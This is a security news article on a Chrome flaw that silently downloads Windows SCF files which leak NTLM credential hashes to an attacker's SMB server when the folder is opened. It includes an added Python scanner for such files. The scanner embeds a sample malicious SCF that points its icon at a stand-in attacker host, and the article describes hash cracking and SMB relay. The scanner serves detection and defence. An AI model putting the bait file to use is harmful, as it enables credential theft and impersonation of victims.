A flaw in Google Chrome could allow attackers to plant a file on a victim's machine that leaks the victim's Windows credentials. The flaw could also be used to launch SMB relay attacks.
The flaw was discovered by Bosko Stankovic, security engineer at DefenseCode. In a blog post he said that once a victim is duped into clicking a malicious link in a Chrome browser window, the browser downloads a Windows Explorer Shell Command File, or SCF file. Chrome automatically treats such files as safe, so the download completes without prompting the user.
The file does nothing until the folder it was saved to is opened in Windows Explorer. Explorer then automatically tries to retrieve the icon referenced by the SCF file. When that icon path points at a server controlled by the attacker, the user's computer authenticates to it, sending the username and the NTLM hash of the password rather than the password itself. That information is captured by the attacker.
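The mechanism above (an SCF file whose icon reference points at a remote host, which Explorer resolves by authenticating over SMB) can be checked for in a download directory. The following is an added example written for this page, not code from DefenseCode or from the article: it parses the INI-style sections of an SCF file and flags any whose `IconFile` entry is a UNC path to a non-local host. The `[Shell]`/`IconFile=` layout is the publicly documented SCF format, not something the article shows, and the sample files and the host `203.0.113.10` are constructed for the demonstration.

```python
import re

# Constructed sample of the kind of SCF file described in the article:
# the icon is fetched from a (hypothetical) attacker-controlled host,
# which makes Explorer authenticate to it over SMB.
MALICIOUS_SCF = """[Shell]
Command=2
IconFile=\\\\203.0.113.10\\share\\icon.ico
[Taskbar]
Command=ToggleDesktop
"""

# Constructed benign SCF (the classic "Show Desktop" shortcut): the icon
# comes from a local DLL, so nothing leaves the machine.
BENIGN_SCF = """[Shell]
Command=2
IconFile=%SystemRoot%\\system32\\SHELL32.dll,3
[Taskbar]
Command=ToggleDesktop
"""

# UNC path: \\host\share\... or //host/share/...; group 1 is the host.
UNC_RE = re.compile(r'^(?:\\\\|//)([^\\/]+)(?:[\\/]|$)')

# Hosts that resolve to the local machine and therefore leak nothing.
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def parse_scf(text):
    """Parse SCF (INI-style) text into {section: {key: value}}.

    Section and key names are lower-cased because Explorer matches them
    case-insensitively; blank lines and ';'/'#' comments are skipped.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def remote_icon_host(scf_text):
    """Return the remote host the SCF's icon would be fetched from, or None.

    None means the icon path is local (a file path, an environment-variable
    path, or a UNC path to the loopback host), so opening the folder does
    not trigger an outbound SMB authentication.
    """
    shell = parse_scf(scf_text).get("shell", {})
    match = UNC_RE.match(shell.get("iconfile", ""))
    if not match:
        return None
    host = match.group(1)
    if host.lower() in LOCAL_HOSTS:
        return None
    return host


def find_credential_leaking_scfs(files):
    """Scan {filename: content} (e.g. a download directory) for SCF files
    whose icon reference points at a remote host. Returns [(name, host)].
    """
    hits = []
    for name, content in files.items():
        if not name.lower().endswith(".scf"):
            continue
        host = remote_icon_host(content)
        if host is not None:
            hits.append((name, host))
    return hits


if __name__ == "__main__":
    # Constructed "download directory" contents.
    downloads = {
        "invoice.scf": MALICIOUS_SCF,
        "show-desktop.scf": BENIGN_SCF,
        "readme.txt": MALICIOUS_SCF,  # wrong extension, Explorer ignores it
    }
    for name, host in find_credential_leaking_scfs(downloads):
        print(f"{name}: icon fetched from remote host {host}")
```

Only the `.scf` extension is checked because that is what makes Explorer treat the file as a shell command file; a real scanner would walk the download directory with `os.scandir` and feed file contents into `find_credential_leaking_scfs`.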
“The remote SMB server set up by the attacker is ready to capture the victim’s username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password,” said Stankovic.
He said that an attacker needs only to entice a victim running fully updated Google Chrome and Windows to visit the attacker's website in order to capture and reuse the victim's authentication credentials.
“Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources,” he added.
The captured authentication can also be used in an SMB relay attack, which does not require cracking the hash at all.
“Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password.”
Stankovic said he hoped that an update for Google Chrome would be rolled out to fix the issue, and added that Google had been notified of the problem.
This article originally appeared at scmagazineuk.com